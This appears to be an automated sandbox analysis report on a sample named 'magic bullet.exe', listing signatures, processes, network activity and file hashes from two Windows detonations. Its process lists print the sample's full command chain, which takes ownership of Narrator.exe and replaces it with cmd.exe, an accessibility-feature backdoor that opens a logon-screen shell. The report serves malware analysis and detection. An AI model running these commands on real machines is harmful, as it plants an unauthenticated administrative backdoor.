Analysis Overview
SHA256
6e4dab751fbe948902330e6b3a2d4631c397dd7d2ca697b28495a5fbd457eeb9
Threat Level: Likely malicious
The file magic bullet.exe was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Checks computer location settings
Modifies file permissions
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in System32 directory
Unsigned PE
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-19 07:52
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 07:52
Reported
2024-06-19 07:57
Platform
win7-20240220-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\System32\Narrator.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\Narrator.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\Narrator.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\magic bullet.exe
"C:\Users\Admin\AppData\Local\Temp\magic bullet.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\26B3.tmp\26B4.tmp\26B5.bat "C:\Users\Admin\AppData\Local\Temp\magic bullet.exe""
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\Narrator.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\narrator.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\Windows\System32\Narrator.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\Windows\System32\Narrator.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\Windows\System32\cmd.exe" -Destination "C:\Windows\System32\Narrator.exe" -r -force
Network
Files
C:\Users\Admin\AppData\Local\Temp\26B3.tmp\26B4.tmp\26B5.bat
| MD5 | 77f4e1f83104fbc97dcc463422e49a74 |
| SHA1 | 2fd9db1e520bc6e3dbc080002046b1d9648d7c50 |
| SHA256 | 10eed1ec991565617150a585c779035acd9eccf6506a2d7a46c8c9d4e89ccad8 |
| SHA512 | 3bcf11580d6eabd0ef9970bcd6b5273c499698712f892f9e1c3b6b13d45d4970eb126963e9c7f59b6b64d6fac1acb477141ed0a997f13339a234fea750c06da6 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 25bd33893b2e4aa2aac09baefc2dfc6b |
| SHA1 | 0f28bc7515989cb25b97cc446f93f8d5fa8f58c8 |
| SHA256 | fb138ff46ef7e85e6578ce1e77d0a78becbc189b482366e4a3b90cc1d44e73f9 |
| SHA512 | 9d59fcb0b478e83ff3f086032350c44b6b548a9b4a243667e6bacdb8dd88869157b6bfe271d6282b6c1418770123cfecf6b0845e7e01b987e6b0688ec8edcf87 |
memory/2560-21-0x000000001B670000-0x000000001B952000-memory.dmp
memory/2560-22-0x0000000001DA0000-0x0000000001DA8000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 4a54384f72f6f213c644bceab64bf92c |
| SHA1 | ab498da3a4284529d15fe581c27b217b267d58ab |
| SHA256 | 4dd414093f7619f4a8220cd7cd5231ea7beedb8c10c0ed1ef47656f78528ee68 |
| SHA512 | 7905f8c02849326b1637706f05e1df736203fe94dfa8af1aa12e5dcd917ab380fd1bebe82c6a4d45188c36063d74513fdabf7024d9ddf62c29e563e27086d021 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WR1MTN7N9JIOJ9K48BX6.temp
| MD5 | f9a169d36cf6501389d4ea2cbcecbed1 |
| SHA1 | faed464f6ffe7c32167043614419d86f7b85344f |
| SHA256 | a5cb064b11bb50766a530d4a3a42c0aaf7b6c8f1c8e7be782a3853c2f1452d2e |
| SHA512 | c599445f94cd459ebcc4e68c65a8263cd0b43de2c54d57efc03f6928d787713c55a944802c0ce4b8579d30ae815071d6303935efebb3fed929da9a3f0d51d009 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-19 07:52
Reported
2024-06-19 07:57
Platform
win10v2004-20240611-en
Max time kernel
295s
Max time network
259s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\magic bullet.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\System32\Narrator.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\Narrator.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\Narrator.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\magic bullet.exe
"C:\Users\Admin\AppData\Local\Temp\magic bullet.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D07F.tmp\D080.tmp\D081.bat "C:\Users\Admin\AppData\Local\Temp\magic bullet.exe""
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\Narrator.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\narrator.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\Windows\System32\Narrator.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\Windows\System32\Narrator.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\Windows\System32\cmd.exe" -Destination "C:\Windows\System32\Narrator.exe" -r -force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4304,i,12594301322143882025,16832588342008839449,262144 --variations-seed-version --mojo-platform-channel-handle=3048 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.125.209.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\D07F.tmp\D080.tmp\D081.bat
| MD5 | 77f4e1f83104fbc97dcc463422e49a74 |
| SHA1 | 2fd9db1e520bc6e3dbc080002046b1d9648d7c50 |
| SHA256 | 10eed1ec991565617150a585c779035acd9eccf6506a2d7a46c8c9d4e89ccad8 |
| SHA512 | 3bcf11580d6eabd0ef9970bcd6b5273c499698712f892f9e1c3b6b13d45d4970eb126963e9c7f59b6b64d6fac1acb477141ed0a997f13339a234fea750c06da6 |
memory/3348-2-0x00007FFFABFC3000-0x00007FFFABFC5000-memory.dmp
memory/3348-3-0x000001D3EE140000-0x000001D3EE162000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_34rl15lx.zcc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3348-13-0x00007FFFABFC0000-0x00007FFFACA81000-memory.dmp
memory/3348-14-0x00007FFFABFC0000-0x00007FFFACA81000-memory.dmp
memory/3348-18-0x00007FFFABFC0000-0x00007FFFACA81000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 50a8221b93fbd2628ac460dd408a9fc1 |
| SHA1 | 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6 |
| SHA256 | 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e |
| SHA512 | 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |